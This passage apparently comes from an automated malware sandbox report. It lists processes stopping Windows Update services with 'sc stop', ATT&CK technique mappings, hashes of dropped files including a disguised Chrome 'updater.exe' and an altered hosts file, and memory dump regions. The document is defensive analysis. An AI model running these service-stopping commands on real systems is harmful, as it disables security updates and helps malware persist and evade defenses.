C:\Windows\System32\sc.exe
sc stop wuauserv
1⤵
- Launches sc.exe
PID:1736

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
1⤵
- Launches sc.exe
PID:1264

C:\Windows\System32\sc.exe
sc stop UsoSvc
1⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:984

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe

Filesize
6.7MB

MD5
57bc38aa4830968ccfd83ddf9417c93f

SHA1
31b3dc9a13f1a9fffc2eeb272494bf60fc385338

SHA256
f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919

SHA512
26f999a4748cb2a7e2b04bf08eef66e8a143927e8a7328592b812243a8e0ec16f91bb9aa353b6f5df9c7bd0f71503521f1e15ad4337a46517795e4163b36a9c7

Download Submit
C:\Program Files\Google\Chrome\updater.exe

Filesize
6.7MB

MD5
57bc38aa4830968ccfd83ddf9417c93f

SHA1
31b3dc9a13f1a9fffc2eeb272494bf60fc385338

SHA256
f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919

SHA512
26f999a4748cb2a7e2b04bf08eef66e8a143927e8a7328592b812243a8e0ec16f91bb9aa353b6f5df9c7bd0f71503521f1e15ad4337a46517795e4163b36a9c7

Download Submit
C:\Program Files\Google\Libs\g.log

Filesize
198B

MD5
37dd19b2be4fa7635ad6a2f3238c4af1

SHA1
e5b2c034636b434faee84e82e3bce3a3d3561943

SHA256
8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

SHA512
86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
61ac463f92f85c5fc87e6f686e3e4bab

SHA1
d3ecc159012f1e66cc77dc3f3bc1f82e6f1094a9

SHA256
c26fd19f4bdb0becd713125142a62740dd9b4ed858c9e801af639c9bca4a5deb

SHA512
93b51f9bfddd61db715ba2d7c4bfb3dd0c8560d6f6cd28bf16b9c47a09e738ca095c685de1ba91892f07b72bf2c0660ef62aac2f7a38109fa090792fe7fa19f5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
61ac463f92f85c5fc87e6f686e3e4bab

SHA1
d3ecc159012f1e66cc77dc3f3bc1f82e6f1094a9

SHA256
c26fd19f4bdb0becd713125142a62740dd9b4ed858c9e801af639c9bca4a5deb

SHA512
93b51f9bfddd61db715ba2d7c4bfb3dd0c8560d6f6cd28bf16b9c47a09e738ca095c685de1ba91892f07b72bf2c0660ef62aac2f7a38109fa090792fe7fa19f5

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
4ac8a26e2cee1347880edccb47ab30ea

SHA1
a629f6d453014c9dccb98987e1f4b0a3d4bdd460

SHA256
de574c85b289f23bba4b932a4c48397c4c61904cb6df086726dd7f8049624c3a

SHA512
fc2af80b2e84ae114ae06144b9ec41eed50250e20f18db3d114ac8d2c59ebbfcd440f59d12f173ea6a94bcf394b0cecee9e120265112b7043bf9e2bd636d6a8a

Download Submit
\Program Files\Google\Chrome\updater.exe

Filesize
6.7MB

MD5
57bc38aa4830968ccfd83ddf9417c93f

SHA1
31b3dc9a13f1a9fffc2eeb272494bf60fc385338

SHA256
f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919

SHA512
26f999a4748cb2a7e2b04bf08eef66e8a143927e8a7328592b812243a8e0ec16f91bb9aa353b6f5df9c7bd0f71503521f1e15ad4337a46517795e4163b36a9c7

Download Submit
memory/672-114-0x00000000010FB000-0x000000000111A000-memory.dmp

Filesize
124KB

Download
memory/672-110-0x000007FEF3CE0000-0x000007FEF4703000-memory.dmp

Filesize
10.1MB

Download
memory/672-112-0x00000000010F4000-0x00000000010F7000-memory.dmp

Filesize
12KB

Download
memory/672-113-0x00000000010FB000-0x000000000111A000-memory.dmp

Filesize
124KB

Download
memory/672-111-0x000007FEF3180000-0x000007FEF3CDD000-memory.dmp

Filesize
11.4MB

Download
memory/760-143-0x0000000000440000-0x0000000000460000-memory.dmp

Filesize
128KB

Download
memory/760-146-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/760-147-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/932-64-0x00000000025D4000-0x00000000025D7000-memory.dmp

Filesize
12KB

Download
memory/932-62-0x000007FEF3B20000-0x000007FEF467D000-memory.dmp

Filesize
11.4MB

Download
memory/932-60-0x000007FEFB8B1000-0x000007FEFB8B3000-memory.dmp

Filesize
8KB

Download
memory/932-65-0x00000000025DB000-0x00000000025FA000-memory.dmp

Filesize
124KB

Download
memory/932-63-0x00000000025D4000-0x00000000025D7000-memory.dmp

Filesize
12KB

Download
memory/932-61-0x000007FEF4680000-0x000007FEF50A3000-memory.dmp

Filesize
10.1MB

Download
memory/1092-124-0x000007FEF3B20000-0x000007FEF467D000-memory.dmp

Filesize
11.4MB

Download
memory/1092-134-0x0000000001224000-0x0000000001227000-memory.dmp

Filesize
12KB

Download
memory/1092-135-0x000000000122B000-0x000000000124A000-memory.dmp

Filesize
124KB

Download
memory/1092-121-0x000007FEF4680000-0x000007FEF50A3000-memory.dmp

Filesize
10.1MB

Download
memory/1300-94-0x0000000077030000-0x00000000771D9000-memory.dmp

Filesize
1.7MB

Download
memory/1300-93-0x000000013F260000-0x000000013FE9D000-memory.dmp

Filesize
12.2MB

Download
memory/1300-66-0x000000013F260000-0x000000013FE9D000-memory.dmp

Filesize
12.2MB

Download
memory/1300-59-0x0000000077030000-0x00000000771D9000-memory.dmp

Filesize
1.7MB

Download
memory/1300-54-0x000000013F260000-0x000000013FE9D000-memory.dmp

Filesize
12.2MB

Download
memory/1300-58-0x000000013F260000-0x000000013FE9D000-memory.dmp

Filesize
12.2MB

Download
memory/1300-57-0x000000013F260000-0x000000013FE9D000-memory.dmp

Filesize
12.2MB

Download
memory/1300-56-0x000000013F260000-0x000000013FE9D000-memory.dmp

Filesize
12.2MB

Download
memory/1300-55-0x000000013F260000-0x000000013FE9D000-memory.dmp

Filesize
12.2MB

Download
memory/1448-106-0x000000013FD90000-0x00000001409CD000-memory.dmp

Filesize
12.2MB

Download
memory/1448-136-0x000000013FD90000-0x00000001409CD000-memory.dmp

Filesize
12.2MB

Download
memory/1868-98-0x000000000262B000-0x000000000264A000-memory.dmp

Filesize
124KB

Download
memory/1868-95-0x000007FEF3B20000-0x000007FEF467D000-memory.dmp

Filesize
11.4MB

Download
memory/1868-92-0x000007FEF4680000-0x000007FEF50A3000-memory.dmp

Filesize
10.1MB

Download
memory/1868-97-0x0000000002624000-0x0000000002627000-memory.dmp

Filesize
12KB

Download
memory/1996-71-0x000007FEF3CE0000-0x000007FEF4703000-memory.dmp

Filesize
10.1MB

Download
memory/1996-74-0x000007FEF3180000-0x000007FEF3CDD000-memory.dmp

Filesize
11.4MB

Download
memory/1996-87-0x000000000240B000-0x000000000242A000-memory.dmp

Filesize
124KB

Download
memory/1996-88-0x000000000240B000-0x000000000242A000-memory.dmp

Filesize
124KB

Download
memory/1996-86-0x0000000002404000-0x0000000002407000-memory.dmp

Filesize
12KB

Download
memory/2008-102-0x000000013FD90000-0x00000001409CD000-memory.dmp

Filesize
12.2MB

Download
memory/2008-137-0x000000013FD90000-0x00000001409CD000-memory.dmp

Filesize
12.2MB

Download
memory/2008-103-0x000000013FD90000-0x00000001409CD000-memory.dmp

Filesize
12.2MB

Download
memory/2008-105-0x000000013FD90000-0x00000001409CD000-memory.dmp

Filesize
12.2MB

Download
memory/2008-108-0x0000000077030000-0x00000000771D9000-memory.dmp

Filesize
1.7MB

Download
memory/2008-104-0x000000013FD90000-0x00000001409CD000-memory.dmp

Filesize
12.2MB

Download
memory/2008-144-0x000000013FD90000-0x00000001409CD000-memory.dmp

Filesize
12.2MB

Download
memory/2008-107-0x000000013FD90000-0x00000001409CD000-memory.dmp

Filesize
12.2MB

Download
memory/2008-145-0x0000000077030000-0x00000000771D9000-memory.dmp

Filesize
1.7MB

Download